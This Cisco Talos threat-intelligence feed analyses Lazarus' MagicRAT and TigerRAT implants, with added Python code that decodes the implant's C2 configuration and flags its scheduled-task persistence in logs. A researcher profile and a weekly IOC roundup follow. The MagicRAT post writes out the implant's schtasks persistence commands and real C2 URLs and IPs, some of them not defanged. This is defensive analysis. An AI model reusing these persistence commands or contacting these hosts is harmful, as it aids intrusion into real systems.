
MagicRAT: Lazarus’ latest gateway into victim networks

7 September 2022 at 12:01










By Jung soo An, Asheer Malhotra and Vitor Ventura.

  • Cisco Talos has discovered a new remote access trojan (RAT) we're calling "MagicRAT," developed and operated by the Lazarus APT group, which the U.S. government believes is a North Korean state-sponsored actor.
  • Lazarus deployed MagicRAT after successfully exploiting vulnerabilities in publicly exposed VMware Horizon platforms.
  • We've also found links between MagicRAT and another RAT known as "TigerRAT," disclosed and attributed to Lazarus by the Korean Internet & Security Agency (KISA) recently.
  • TigerRAT has evolved over the past year to include new functionalities that we illustrate in this blog.



Executive Summary


Cisco Talos has discovered a new remote access trojan (RAT), which we are calling "MagicRAT," that we attribute with moderate to high confidence to the Lazarus threat actor, a state-sponsored APT attributed to North Korea by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The RAT was found on victims that had initially been compromised through the exploitation of publicly exposed VMware Horizon platforms. While relatively simple in terms of capabilities, MagicRAT was built on the Qt Framework, apparently with the sole intent of making human analysis harder and automated detection through machine learning and heuristics less likely.

We have also found evidence to suggest that once MagicRAT is deployed on infected systems, it launches additional payloads such as custom-built port scanners. Additionally, we've found that MagicRAT's C2 infrastructure was also used to host newer variants of known Lazarus implants such as TigerRAT.

The discovery of MagicRAT in the wild is an indication of Lazarus' motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide.


Actor profile





Attribution


Cisco Talos assesses with moderate to high confidence these attacks have been conducted by the North Korean state-sponsored threat actor Lazarus Group. This attribution is based on tactics, techniques and procedures (TTPs), malware implants and infrastructure overlap with known Lazarus campaigns.

We have observed overlaps between the C2 servers serving MagicRAT and previously disclosed Lazarus campaigns that used the Dtrack RAT family. Talos has also discovered C2 servers hosting and serving TigerRAT to existing MagicRAT infections. TigerRAT is a malware family attributed to the Lazarus APT group by the Korean Internet & Security Agency (KISA).

In some infections, we observed the deployment of MagicRAT by the attackers for some time, followed by its removal and the subsequent download and execution of another custom-developed malware called "VSingle," another implant disclosed and attributed to Lazarus by JPCERT.


Technical analysis


MagicRAT

MagicRAT is written in C++ and statically links the Qt Framework into both the 32- and 64-bit builds. Qt is a library for developing graphical user interfaces, of which this RAT has none. Talos believes the objective was to increase the complexity of the code, making human analysis harder. Since there are very few examples (if any) of malware built with Qt, it also makes machine learning and heuristic detection less reliable.

The 32-bit version was compiled with GCC v3.4 using mingw/cygwin for Microsoft Windows support; the 64-bit version was compiled with VisualC64, version 7.14.

The RAT uses Qt classes throughout its code. The configuration is held in a QSettings object and eventually saved to disk, which is standard QSettings behaviour.

The malware configuration (the author-defined QSettings) is stored in the file "visual.1991-06.com.microsoft_sd.kit" under the path "\ProgramData\WindowsSoftwareToolkit". The names and paths were obviously chosen to make the files look like part of the operating system.

The image below shows an example of a configuration file. During our analysis, we identified three sections in the configuration file:

  • [os] which contains the command and control (C2) URLs.
  • [General] which holds general information.
  • [company] which holds data used in the communication with the C2.


All analyzed samples contain three encoded C2 URLs, which are used to register the infection and then receive commands to execute on the infected endpoint. They are stored in the configuration file under the keys "windows", "linux" and "mac". Each value is the fixed prefix "LR02DPt22R" followed by the base64-encoded URL.
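As an added example (not code from the Talos post or from the implant itself), the following decoder handles the configuration layout described above: an INI-style QSettings file whose [os] values carry the prefix "LR02DPt22R" followed by a base64-encoded C2 URL. The sample configuration is constructed here; its two URLs are the MagicRAT C2 paths from the IOC list at the end of the post, and the [General] and [company] keys are placeholders, since the post does not list their contents.

```python
import base64
import configparser
from typing import Dict

# Fixed prefix MagicRAT puts in front of each base64-encoded C2 URL in the [os] section.
C2_PREFIX = "LR02DPt22R"
# The three keys under which the URLs are stored; all point at C2 endpoints regardless of the OS name.
C2_KEYS = ("windows", "linux", "mac")


def decode_c2_value(value: str) -> str:
    """Strip the fixed prefix from one [os] value and base64-decode the URL.

    Raises ValueError when the prefix is absent, so that pointing the parser at an
    unrelated .kit/.ini file fails loudly instead of returning decoded noise.
    """
    value = value.strip().strip('"')  # QSettings quotes values containing special characters
    if not value.startswith(C2_PREFIX):
        raise ValueError(f"missing {C2_PREFIX!r} prefix in value {value[:16]!r}")
    return base64.b64decode(value[len(C2_PREFIX):], validate=True).decode("utf-8")


def parse_magicrat_config(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-style QSettings file and decode the C2 URLs in its [os] section."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case exactly as the implant wrote it
    cp.read_string(text)
    c2 = {key: decode_c2_value(cp.get("os", key)) for key in C2_KEYS if cp.has_option("os", key)}
    return {
        "c2": c2,
        "general": dict(cp["General"]) if cp.has_section("General") else {},
        "company": dict(cp["company"]) if cp.has_section("company") else {},
    }


def _encode_c2(url: str) -> str:
    """Build one [os] value the way the implant stores it (used only to construct the sample)."""
    return C2_PREFIX + base64.b64encode(url.encode("utf-8")).decode("ascii")


# Constructed sample configuration. The two URLs are the MagicRAT C2 paths from the IOC list;
# the [General] and [company] keys are placeholders, since the post does not list their contents.
SAMPLE_CONFIG = f"""[os]
windows={_encode_c2("http://64.188.27.73/adm_bord/login_new_check.php")}
linux={_encode_c2("http://gendoraduragonkgp126.com/board/index.php")}
mac={_encode_c2("http://64.188.27.73/adm_bord/login_new_check.php")}

[General]
sleep=60

[company]
id=placeholder-host-id
"""

if __name__ == "__main__":
    for name, url in parse_magicrat_config(SAMPLE_CONFIG)["c2"].items():
        print(f"{name:8s} {url}")
```

The prefix check is deliberate: QSettings files from legitimate software share the same INI layout, so a decoder that silently base64-decodes whatever it finds under [os] would produce convincing-looking garbage on the wrong file. Refusing values without the prefix turns that into an error the analyst sees.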

Upon execution, MagicRAT achieves persistence by running hardcoded commands that create scheduled tasks on the victim machine and by dropping a shortcut in the user's Startup folder.

Command | Intent
schtasks /create /tn "OneDrive AutoRemove" /tr "C:\Windows\System32\cmd.exe /c del /f /q C:/TEMP/[MagicRAT_file_name].exe" /sc daily /st 10:30:30 /ru SYSTEM | Scheduled task, run daily at a fixed time as SYSTEM, that deletes the MagicRAT binary from C:\TEMP [T1053.005]
schtasks /create /tn "Microsoft\Windows\light Service Manager" /tr C:/TEMP/[MagicRAT_file_name].exe /sc onstart /ru SYSTEM | Scheduled task that runs the implant from C:\TEMP as SYSTEM at every system start [T1053.005]
%HOME%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/OneNote.lnk | Shortcut placed in the user's Startup folder [T1547.001]
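The persistence commands above are a compact hunting signal. What follows is an added detection example, not Talos or Cisco product code: it parses schtasks /create command lines from process-creation telemetry and reports the traits that make them look like MagicRAT's tasks: one of the two known task names, an action under C:\TEMP, a cmd.exe /c del self-cleanup action, and a SYSTEM task triggered at boot. The four log lines are constructed, and the file name svc.exe stands in for the [MagicRAT_file_name] placeholder.

```python
import re
from typing import Dict, List, Optional

# Task names from the two schtasks commands Talos observed, compared case-insensitively.
KNOWN_TASK_NAMES = {
    "onedrive autoremove",
    "microsoft\\windows\\light service manager",
}

# A double-quoted argument stays one token; everything else splits on whitespace.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted arguments intact and dropping the quotes."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def parse_schtasks_create(cmdline: str) -> Optional[Dict[str, str]]:
    """Return the /tn, /tr, /sc, /st and /ru values of a 'schtasks /create', or None otherwise."""
    toks = tokenize(cmdline)
    if not toks:
        return None
    exe = toks[0].lower().replace("/", "\\").rsplit("\\", 1)[-1]
    if exe not in ("schtasks", "schtasks.exe"):
        return None
    lowered = [t.lower() for t in toks]
    if "/create" not in lowered:
        return None
    fields: Dict[str, str] = {}
    for i, flag in enumerate(lowered[:-1]):
        if flag in ("/tn", "/tr", "/sc", "/st", "/ru"):
            fields[flag[1:]] = toks[i + 1]
    return fields


def persistence_findings(cmdline: str) -> List[str]:
    """List the MagicRAT-like traits of a scheduled-task creation (empty list = nothing notable)."""
    fields = parse_schtasks_create(cmdline)
    if fields is None:
        return []
    task_name = fields.get("tn", "")
    action = fields.get("tr", "").lower()
    action_path = action.replace("/", "\\")  # the implant mixes C:/TEMP and C:\TEMP spellings
    findings = []
    if task_name.lower() in KNOWN_TASK_NAMES:
        findings.append(f"known MagicRAT task name {task_name!r}")
    if "c:\\temp\\" in action_path:
        findings.append("task action references C:\\TEMP")
    if "cmd.exe" in action and re.search(r"\bdel\b", action):
        findings.append("task action deletes a file (self-cleanup task)")
    if fields.get("ru", "").lower() == "system" and fields.get("sc", "").lower() == "onstart":
        findings.append("runs as SYSTEM at every boot")
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Apply the check to process-creation records of the form '<host> CommandLine: <command>'."""
    hits = []
    for line in lines:
        host, sep, cmd = line.partition(" CommandLine: ")
        if sep and (why := persistence_findings(cmd)):
            hits.append({"host": host.strip(), "cmdline": cmd, "findings": why})
    return hits


# Constructed telemetry: the first two lines are the commands from the post with svc.exe standing in
# for the [MagicRAT_file_name] placeholder; the last two are benign noise.
SAMPLE_LOG = [
    r'ws01 CommandLine: schtasks /create /tn "OneDrive AutoRemove" /tr "C:\Windows\System32\cmd.exe /c del /f /q C:/TEMP/svc.exe" /sc daily /st 10:30:30 /ru SYSTEM',
    r'ws01 CommandLine: schtasks /create /tn "Microsoft\Windows\light Service Manager" /tr C:/TEMP/svc.exe /sc onstart /ru SYSTEM',
    r'ws02 CommandLine: schtasks /create /tn "Nightly Backup" /tr "C:\Program Files\Backup\bk.exe" /sc daily /st 02:00 /ru SYSTEM',
    r"ws02 CommandLine: ipconfig /all",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["host"], "->", "; ".join(hit["findings"]))
```

The task names alone are brittle (the operator can rename them), which is why the check also keys on the shape of the action: a SYSTEM task launching a binary out of C:\TEMP, or a task whose whole job is to delete an executable, is unusual enough in most fleets to be worth a look regardless of the name.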

Upon achieving persistence, the RAT contacts the C2.




During the initial stages of execution, MagicRAT performs just enough reconnaissance to identify the system and the environment the attackers have landed in, by running whoami, systeminfo and ipconfig /all. The output of the last command is returned to the C2 by uploading the file zero_dump.mix.

MagicRAT is rather simple — it provides the operator with a remote shell on the victim's system for arbitrary command execution, along with the ability to rename, move and delete files on the endpoint. The operator can determine the timing for the implant to sleep, change the C2 URLs and delete the implant from the infected system.

We also discovered a new MagicRAT variant in the wild, built in April 2022. This sample adds the ability to delete itself from the infected endpoint using a BAT file.



Additional malware


One of the C2 servers used by the new MagicRAT sample, 64[.]188[.]27[.]73, hosted two more distinct implants masquerading as GIF URLs: MagicRAT can request a "GIF" file from its C2 that is actually an executable.

 

Lightweight port scanner

One of the GIF files discovered on the MagicRAT C2 is called "pct.gif," which is an extremely simple port scanner, whose main code fits into the image below.

It takes three arguments: the IP address to connect to, the port number and a flag that selects whether the result is written to a log file on disk or to standard output. After a successful connection, the executable writes the string "Connection success!" either to standard output or to a log file called "Ahnupdate.log" in the current user's temporary directory.


TigerRAT

The second implant hosted on MagicRAT's C2 is a remote access trojan (RAT) known as TigerRAT. TigerRAT was disclosed in 2021 by KISA and KrCERT as part of "Operation ByteTiger," which detailed TigerRAT and its downloader, "TigerDownloader."

This implant consists of several RAT capabilities, ranging from arbitrary command execution to file management. Capabilities of the implant include:

  • Gather system information: username, computer name, network interface info, system info including product and version.
  • Run arbitrary commands on the endpoint: set/get CWD, run command via cmd.exe.
  • Screen capture.
  • Socks tunneling.
  • Keylogging.
  • File management: drive reconnaissance, enumerate/delete files, create and write to files, read files and upload contents to C2, create processes.
  • Self delete/uninstall from system.

Implant capability to run arbitrary commands.
The latest TigerRAT versions included one new capability with indicators of a second capability set to be introduced soon. One of these capabilities is called "USB dump." The authors have also created skeleton code in preparation for implementing video capture from Web cameras, though it hasn't been implemented yet.


USB Dump


The USB Dump capability gives the attackers the ability to:

  • Enumerate files for path "LOCAL_APPDATA\GDIFONTC".
  • Delete files.
  • Find files of specific extensions in a specified drive and folder: .docx, .hwp, .doc, .txt, .pdf, .zip, .zoo, .arc, .lzh, .arj, .gz, .tgz. Add these files to an existing archive - in preparation for exfiltration. This is the main functionality of this new capability.

The image below shows the code used to check the file extensions.



Lazarus' implants commonly stitch together functionalities, occasionally removing and adding functions, as the latest TigerRAT samples show: while Lazarus added USB dumping and skeleton code for webcam capture, they removed the port-forwarding capability in the latest version. Older TigerRAT variants (seen in 2020-2021) used encrypted strings, whereas the latest variant keeps its strings in plaintext.


Coverage


Ways our customers can detect and block this threat are listed below.



Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.



IOCs

The IOC list is also available in Talos' Github repo here.


MagicRAT

f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332


TigerRAT

f78cabf7a0e7ed3ef2d1c976c1486281f56a6503354b87219b466f2f7a0b65c4
1f8dcfaebbcd7e71c2872e0ba2fc6db81d651cf654a21d33c78eae6662e62392
bffe910904efd1f69544daa9b72f2a70fb29f73c51070bde4ea563de862ce4b1
196fb1b6eff4e7a049cea323459cfd6c0e3900d8d69e1d80bffbaabd24c06eba


TigerRAT unpacked

1c926fb3bd99f4a586ed476e4683163892f3958581bf8c24235cd2a415513b7f
f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c
23eff00dde0ee27dabad28c1f4ffb8b09e876f1e1a77c1e6fb735ab517d79b76
ca932ccaa30955f2fffb1122234fb1524f7de3a8e0044de1ed4fe05cab8702a5


Port Scanner

d20959b615af699d8fff3f0087faade16ed4919355a458a32f5ae61badb5b0ca


URLs

hxxp[://]64[.]188[.]27[.]73/adm_bord/login_new_check[.]php
hxxp[://]gendoraduragonkgp126[.]com/board/index[.]php
hxxp[://]64[.]188[.]27[.]73/board/mfcom1.gif
hxxp[://]64[.]188[.]27[.]73/board/pct.gif
hxxp[://]64[.]188[.]27[.]73/board/logo_adm_org.gif
hxxp[://]64[.]188[.]27[.]73/board/tour_upt.html


IPs

193[.]56[.]28[.]251
52[.]202[.]193[.]124
64[.]188[.]27[.]73
151[.]106[.]2[.]139
66[.]154[.]102[.]91



Researcher Spotlight: How Asheer Malhotra looks for ‘instant gratification’ in threat hunting

6 September 2022 at 12:00

The India native has transitioned from a reverse-engineer hobbyist to a public speaker in just a few years

 
By Jon Munshaw. 

Ninety percent of Asheer Malhotra’s work will never see the light of day. But it’s that 10 percent that keeps him motivated to keep looking for something new. 

The Talos Outreach researcher spends most of his days looking into potential new threats. Many times, that leads to dead ends of threats that have already been discovered and blocked or don’t have any additional threads to pull on. 

But eventually, the “lightbulb goes off,” as he puts it, which indicates something is a new threat the wider public needs to know about. During his time at Talos, Malhotra has spent much of his time looking into cyber attacks and state-sponsored threat actors in Asia, like the Transparent Tribe group he’s written about several times. 

“At some point, I say ‘Hey, I don’t think I’ve seen this before.’ I start analyzing public disclosures, and slowly start gaining confidence and being able to craft a narrative around the motivations and tactics around a specific threat actor or malware campaign,” he said.

In the case of Transparent Tribe, Malhotra’s tracked their growth as a major player in the threat landscape in Asia, as they’ve added several remote access trojans to their arsenal, targeted high-profile government-adjacent entities in India and expanded their scope across the region.  

When he’s not threat hunting, Malhotra also speaks to Cisco customers about the current state of cybersecurity in briefings and delivers presentations at conferences around the world (mainly virtually during the COVID-19 pandemic).  

“I always try to find the latest and new stuff to talk about. … I’ve been honing my skills and trying to speak more confidently publicly, but the confidence is backed up with the right kind of knowledge and the threat intelligence, that’s what helps me succeed,” he said.  

Malhotra is a native of India and spent most of his life there before coming to the U.S. for his master’s degree at Mississippi State University. Mississippi was a far cry from everything else he had known up until that point, but he quickly adjusted. 

“That was the ‘Deep South,’” he said. “So there was a culture shock, but the southern hospitality is such a real thing, and it felt very normal there.” 

Growing up, Malhotra always knew he wanted to work with computers, starting out as a teenager reverse-engineering exploits he’d see others talk about on the internet or just poking at smaller applications. His additional interest in politics and national security made it natural for him to combine the two and focus his research on state-sponsored actors.  

He enjoys continuing his research in the Indian subcontinent and sees many parallels between the state of security in India and the U.S. 

“These days, the Indian security scene is really budding, there’s a lot of high-profile conferences there. IT, computer science and technology is huge there, and a lot of tech companies have offices there,” he said.  

Because of India's high concentration of tech companies, higher education and government contractors, his main concern currently is intellectual property theft. While many cybersecurity headlines center on "sexier" ransomware attacks, it is threat actors' double-extortion tactics that worry him the most.

In these types of attacks, adversaries will hold files hostage for a paid ransom, following the lines of a traditional ransomware attack. But many actors are starting to threaten to leak that stolen information on the wider internet for all to see (and potentially steal or buy).  

Malhotra called ransomware the "clear and present danger," but said double extortion is becoming top-of-mind for many executives.

The specific state-sponsored actors he’s tracked in the Asia-Pacific region, such as Transparent Tribe and MuddyWater, have matured over the years, as has Malhotra’s security experience. 

“I love seeing how these groups with different levels of competencies and skillsets try to infect their targets,” he said. “And how they’ve evolved since, say, 2016... Their net of victims has expanded, and you see the evolution of their tactics, and it’s fascinating to learn how they operate.” 

The actors and campaigns Malhotra finds often make for some entertainment, too. His work researching the newly discovered Manjusaka framework led to the now-famous "cow poop" illustration on Talos' Twitter, and the Transparent Tribe leopard is a favorite among Talos' "malware mascots" sticker collection.

These discoveries come in a variety of forms. Malhotra said he relies on everything from open-source intelligence, Talos honeypots, telemetry sources and independent research. While this research mainly ends up manifesting itself in one of Talos’ blog posts or a presentation to a customer, Malhotra says he gets the most excitement from knowing he’s making it harder for the threat actor to strike again. While we as defenders may never be able to detect and stop every single cyber threat out there, Malhotra says the goal is to make it more expensive and more cumbersome every time for the attacker. 

“When we disclose a specific operation or campaign, the intention is to burn that campaign so [the actor] has to go back and innovate again and come up with some new TTPs [tactics, techniques and procedures],” he said. “That’s what we’re trying to do — reduce the level of motivation that they have." 

Threat Roundup for August 26 to September 2

2 September 2022 at 19:55

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 26 and Sept. 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Dropper.DarkKomet-9966191-0 | Dropper | DarkKomet is a freeware remote access trojan that was released by an independent software developer. It provides the same functionality you would expect from a remote access tool: keylogging, webcam access, microphone access, remote desktop, URL download, program execution, etc.
Win.Packed.AgentTesla-9966126-1 | Packed | AgentTesla is a Remote Access Trojan that records keystrokes and attempts to steal sensitive information from web browsers and other installed applications.
Win.Virus.Xpiro-9965977-1 | Virus | Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Nanocore-9965501-0 | Dropper | Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Packed.Bandook-9965180-1 | Packed | Bandook is a remote-access trojan (RAT) written in C++ and Delphi. It provides attackers with several abilities common to RATs such as taking screenshots or file uploading, downloading or executing. Bandook is usually delivered through spear-phishing emails containing malicious attachments.
Win.Ransomware.BlackMatter-9965914-0 | Ransomware | BlackCat ransomware, also known as "ALPHV", has quickly gained notoriety for being used in double ransom (encrypted files and stolen file disclosure) attacks against companies. It uses the combination of AES128-CTR and RSA-2048 to encrypt the files on victim's computer.
Win.Dropper.Formbook-9965920-0 | Dropper | Formbook is an information stealer that collects sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.

Threat Breakdown

Win.Dropper.DarkKomet-9966191-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 84 samples
Registry Keys | Value Name | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST | | 18
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | LanguageList | 12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST | C:\Windows\M-50504578520758924620\winmgr.exe | 10
<HKCU>\SOFTWARE\DC3_FEXEC | | 8
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Microsoft Windows Service | 5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Microsoft Windows Service | 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST | C:\Windows\M-5050756432604649683503740\winsvc.exe | 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE | DoNotAllowExceptions | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | MicroUpdate | 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN | | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-100 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-101 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-103 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-102 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-1 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-2 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-4 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-3 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-100 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-101 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-102 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-103 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-100 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-101 | 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-102 | 2
Mutexes Occurrences
t8 6
DC_MUTEX-<random, matching [A-Z0-9]{7}> 5
t10 4
w3 3
w2 2
DCMIN_MUTEX-WG79R6U 2
uxJLpe1m 1
2562100796 1
lol 1
FvLQ49IlzIyLjj6m 1
e621ca05-Mutex 1
{D9961D0B-0106-5584-AD6D-884HSI64CNI9} 1
{D0001D0B-0106-5584-AD6D-884HSI64CNI9} 1
TLS 1
yourhavebecracked 1
crapponce 1
CCC 1
7QSDIYQXU3 1
DCMIN_MUTEX-W1AEX56 1
2CC 1
4444 1
5555 1
CC02 1
w4 1
e2b9ef1ee9bca34ce51187acb9a0f411 1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
58[.]158[.]177[.]102 3
35[.]205[.]61[.]67 1
198[.]49[.]23[.]144/31 1
20[.]72[.]235[.]82 1
20[.]81[.]111[.]85 1
23[.]221[.]227[.]172 1
184[.]105[.]237[.]196 1
188[.]165[.]227[.]65 1
140[.]228[.]29[.]110 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
srv50[.]ru 11
trik[.]su 11
trkbox[.]ru 6
srv60[.]su 5
srv70[.]ru 4
wrksrv[.]ru 4
markben390[.]no-ip[.]org 3
avget[.]ru 2
microsoft[.]com 1
bermanstreetllc[.]com 1
biggymoney01[.]no-ip[.]biz 1
biggymoney03[.]no-ip[.]biz 1
biggymoney2[.]no-ip[.]biz 1
businessswitchedmylife[.]biz 1
nobemetalkam[.]com 1
heavensbreedonline[.]com 1
heavensbreedonline[.]biz 1
heavensbreedonline[.]co 1
heavensbreedonline[.]org 1
seadeeponline[.]com 1
eurofreightglobalonline[.]com 1
swrenvgloballtd[.]com 1
mailsecuredssl[.]com 1
ssl32bit[.]com 1
128bitsecured[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
\autorun.inf 11
\windrv.exe 11
E:\autorun.inf 11
E:\windrv.exe 11
%SystemRoot%\M-50504578520758924620 10
%SystemRoot%\M-50504578520758924620\winmgr.exe 10
%APPDATA%\dclogs 8
%SystemRoot%\M-5050756432604649683503740 3
%SystemRoot%\M-5050756432604649683503740\winsvc.exe 3
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 2
%TEMP%\a 2
%TEMP%\incl2 2
%SystemRoot%\M-50507564324649683503740\winsvc.exe 2
%TEMP%\c 2
%TEMP%\incl1 2
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 2
%HOMEPATH%\Y44VPhclUOy\lib\images\cursors\win32_LinkNoDrop32x32.gif 1
%HOMEPATH%\Y44VPhclUOy\lib\images\cursors\win32_MoveDrop32x32.gif 1
%HOMEPATH%\Y44VPhclUOy\lib\images\cursors\win32_MoveNoDrop32x32.gif 1
%HOMEPATH%\Y44VPhclUOy\lib\jce.jar 1
%HOMEPATH%\Y44VPhclUOy\lib\jfr.jar 1
%HOMEPATH%\Y44VPhclUOy\lib\jfr\default.jfc 1
%HOMEPATH%\Y44VPhclUOy\lib\jfr\profile.jfc 1
%HOMEPATH%\Y44VPhclUOy\lib\jsse.jar 1
%HOMEPATH%\Y44VPhclUOy\lib\jvm.hprof.txt 1
*See JSON for more IOCs

File Hashes

01d99de8be5d399beb94238ded93f68cecce9b05010ec2095fb88dfea30be905
01dc08a7611de9ed95addbdc484f028da8c4cc4f2f04bf007955e8e7771af2ad
0521c25b0e73636633fc888ecb616c71e37cc63cdef64d531938fb41cb5190c3
07fb7af6f5ebe683cea86ec012a0a002771d658873ea3428d989f8ecaccc2e0b
0b8d380e9ff7c2cdd17b4e95d6663d1b21db1c955b0c933d68bd66c9c8b1b74b
0ce96b476d6d0aeaa983de1cf41c4553f68156d6cbbe9d48ae852ef0e5143de7
0edde1077db95438d2598acd555a39b3c2ac432f98b60d3c77415fd650b13516
1a85cf3317d5a030ab87d02649769a6a0bfb1b342ecc46f1bc26e1f651fbb1ed
1abb5ce77ce286aac491f9363161554eb0894dfb425e4457aee3cd3fc22982e9
1dc5ac655a745dc442a017eb4fe0d86a0877726d4c84a026e8eb3dbe528953f9
234eb8f2d2c1a731eb5672006b5c449761e8536b2f6d4b40d20f54e74d631807
259941e22122288262ef81fd0d0412a9b2725a9a0d77f7c6442020b0733ebbed
2b6326b6b21207fd649683ac43062c06eace7074bbd3f726f200a8717b02c75f
2ba447c32a9cfa066bbc502772d11c9fb62404c090a9de7c83d9aa4151dbf35c
2bc2fc0088f069fb5bb5e448b106a6dc91e5177e00c443571baecac8b8afd8f9
2f6fa4f49fb85c80342285a08bd5fc0b9e3f3198f4854973824567fb131b07e0
32c9b04c79b44e5c331c6497b9c11ce942b53e9fe6d6b57211e2dac442bb4d8b
34e3b029473a25d0eed41532071b5fd8f217e24e31642985324e48e0cd832313
35a047096848277ecedf71875652c55466a6d1a167bb82e810591951d991c0ff
3adb310c1ed97474f55974c05a17c56a89d082eb3069592d5734f91b330a8d96
